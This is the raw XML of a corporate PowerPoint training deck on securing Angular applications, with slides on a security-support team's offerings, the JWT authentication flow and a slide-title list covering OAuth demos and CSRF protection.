      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="163171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71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="195486"/>
            <a:ext cx="6653048" cy="567000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Secure your Angular Application</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SDCO Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>upport for Angular</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="137207" y="699542"/>
            <a:ext cx="9001000" cy="4032448"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>Trainings</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" altLang="fr-FR" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Angular</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1400" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>ecure coding (Introduction, OWASP Awareness, …) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Secure your angular </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>app</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" altLang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" altLang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" altLang="fr-FR" sz="700" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>Web Security watch</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Alert on web framework vulnerabilities &amp; mitigations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Part of PCI patch management initiated by TO</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" altLang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" altLang="fr-FR" sz="700" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" altLang="fr-FR" sz="700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t>Guide </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>lines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Publications from Security squad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Publications &amp; Studies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1400" dirty="0"/>
              <a:t>from Expert network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="338287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dirty="0" smtClean="0"/>
              <a:t>Thanks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4738688"/>
            <a:ext cx="638175" cy="273050"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DAF489CC-3B7A-4DA5-A8C0-4984788D0EC5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4198311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94400" y="4738500"/>
            <a:ext cx="637200" cy="273844"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DAF489CC-3B7A-4DA5-A8C0-4984788D0EC5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107504" y="771550"/>
            <a:ext cx="9001000" cy="3672408"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t>JWT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Angular</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1400" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>JWT Authentication flow</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="612775" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>Client logs in</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="612775" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>Server generates </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
              <a:t>JWT</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>sends it to the client</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="612775" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>Client sends JWT each time it </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>requests a resource</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="612775" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>Server checks JWT validity </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0"/>
              <a:t>and if ok returns resource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="-"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="195486"/>
            <a:ext cx="6768752" cy="567000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Secure your Angular Application</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JWT Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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9990" y="483518"/>
            <a:ext cx="4248794" cy="4496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879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JWT_OAuth_AngularJS_demo - juin 08 2017 03.52.3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6856" y="11361"/>
            <a:ext cx="8229600" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="92834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4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Next" delay="0">
                      <p:tgtEl>
                        <p:sldTgt/>
                      </p:tgtEl>
                    </p:cond>
                  </p:endCondLst>
                </p:cTn>
                <p:tgtEl>
                  <p:spTgt spid="4"/>
                </p:tgtEl>
              </p:cMediaNode>
            </p:video>
          </p:childTnLst>
        </p:cTn>
      </p:par>
    </p:tnLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Worldline v4.0">
  <a:themeElements>
    <a:clrScheme name="WL-colors">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="0066A1"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="539BC9"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="0066A1"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="FF6319"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="00B2A9"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="A626AA"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="6639B7"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="AEA400"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="539BC9"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="808080"/>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tos Theme">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="0066A1"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="829DC7"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="0066A1"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="829DC7"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="000000"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="808080"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="FFFFFF"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="BFBFBF"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="0066A1"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="829DC7"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Atos Font PP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documentManagement>
    <LockedVersions xmlns="34008a97-1350-4a0d-8c86-54cd8c3044f3" xsi:nil="true"/>
    <AdvancedVersioningLimit xmlns="34008a97-1350-4a0d-8c86-54cd8c3044f3" xsi:nil="true"/>
    <_dlc_DocId xmlns="a5939d73-38d6-4ac8-8003-0e360d7ac6ab">PTEC2HVDMWAY-21201-30</_dlc_DocId>
    <_dlc_DocIdUrl xmlns="a5939d73-38d6-4ac8-8003-0e360d7ac6ab">
      <Url>https://sp.myatos.net/org/TC/WL_Coms/_layouts/DocIdRedir.aspx?ID=PTEC2HVDMWAY-21201-30</Url>
      <Description>PTEC2HVDMWAY-21201-30</Description>
    </_dlc_DocIdUrl>
    <_dlc_DocIdPersistId xmlns="a5939d73-38d6-4ac8-8003-0e360d7ac6ab" xsi:nil="true"/>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7F74AEDDF85DCC4B951D8BF5474030C9" ma:contentTypeVersion="2" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="2f0970e85ba791b4969fdbb3ed1d7ffe">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="a5939d73-38d6-4ac8-8003-0e360d7ac6ab" xmlns:ns3="34008a97-1350-4a0d-8c86-54cd8c3044f3" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="04e7cbd8930b5a935cabd31cf89ab8c2" ns2:_="" ns3:_="">
    <xsd:import namespace="a5939d73-38d6-4ac8-8003-0e360d7ac6ab"/>
    <xsd:import namespace="34008a97-1350-4a0d-8c86-54cd8c3044f3"/>
    <xsd:element name="properties">
      <xsd:complexType>
        <xsd:sequence>
          <xsd:element name="documentManagement">
            <xsd:complexType>
              <xsd:all>
                <xsd:element ref="ns2:_dlc_DocId" minOccurs="0"/>
                <xsd:element ref="ns2:_dlc_DocIdUrl" minOccurs="0"/>
                <xsd:element ref="ns2:_dlc_DocIdPersistId" minOccurs="0"/>
                <xsd:element ref="ns3:LockedVersions" minOccurs="0"/>
                <xsd:element ref="ns3:AdvancedVersioningLimi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939d73-38d6-4ac8-8003-0e360d7ac6a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34008a97-1350-4a0d-8c86-54cd8c3044f3" elementFormDefault="qualified">
    <xsd:import namespace="http://schemas.microsoft.com/office/2006/documentManagement/types"/>
    <xsd:import namespace="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <xsd:element name="LockedVersions" ma:index="11" nillable="true" ma:displayName="LockedVersions" ma:hidden="true" ma:internalName="LockedVersions" ma:readOnly="false">
      <xsd:simpleType>
        <xsd:restriction base="dms:Text"/>
      </xsd:simpleType>
    </xsd:element>
    <xsd:element name="AdvancedVersioningLimit" ma:index="12" nillable="true" ma:displayName="AdvancedVersioningLimit" ma:hidden="true" ma:internalName="AdvancedVersioningLimit" ma:readOnly="fals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1E98BD-E517-433B-9183-2E9DFDBA4819}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="a5939d73-38d6-4ac8-8003-0e360d7ac6ab"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/documentManagement/types"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/terms/"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/dcmitype/"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/elements/1.1/"/>
    <ds:schemaRef ds:uri="http://www.w3.org/XML/1998/namespace"/>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/package/2006/metadata/core-properties"/>
    <ds:schemaRef ds:uri="34008a97-1350-4a0d-8c86-54cd8c3044f3"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{EB0E51CE-223D-46CA-AEF1-261FD015AD85}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/events"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{F72E2D41-E735-4F3C-B2DF-C3D13CE1969A}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{78F7486A-2358-4DE4-93C5-B9E37E18F6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5939d73-38d6-4ac8-8003-0e360d7ac6ab"/>
    <ds:schemaRef ds:uri="34008a97-1350-4a0d-8c86-54cd8c3044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Atos Bull v4.0</Template>
  <TotalTime>0</TotalTime>
  <Words>2133</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Affichage à l'écran (16:9)</PresentationFormat>
  <Paragraphs>701</Paragraphs>
  <Slides>72</Slides>
  <Notes>70</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>4</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72</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="74" baseType="lpstr">
      <vt:lpstr>Worldline v4.0</vt:lpstr>
      <vt:lpstr>Objet d’environnement du Gestionnaire de liaisons</vt:lpstr>
      <vt:lpstr>Secure your Angular  Application</vt:lpstr>
      <vt:lpstr>Secure your Angular Application       Plan</vt:lpstr>
      <vt:lpstr>Secure your Angular Application     JavaScript frameworks </vt:lpstr>
      <vt:lpstr>Secure your Angular Application      OWASP Top 10</vt:lpstr>
      <vt:lpstr>Authentication by JSON Web Token  (JWT) </vt:lpstr>
      <vt:lpstr>Secure your Angular Application                  JSON Web Token </vt:lpstr>
      <vt:lpstr>Secure your Angular Application                  JSON Web Token</vt:lpstr>
      <vt:lpstr>Secure your Angular Application             JWT Authentication </vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>JWT OAuth Demo with AngularJS  </vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>JWT OAuth Demo with Angular 2  </vt:lpstr>
      <vt:lpstr>PW - JWT Authentication   Installation :    1 - git clone -b PW-Initial https://gitlab.kazan.priv.atos.fr/trainingangular2/secure-angular-training-app.git   2 - Follow the readme  Exercises :    Follow practical_works/PW-JWT-OAuth.txt instructions</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Secure your Angular Application       CSRF </vt:lpstr>
      <vt:lpstr>Secure your Angular Application       CSRF                https://hydrasky.com/wp-content/uploads/2016/08/cross_site_request_forger_1.png.jpg</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>Secure your Angular Application         CSRF – Which Protection for Angular ? </vt:lpstr>
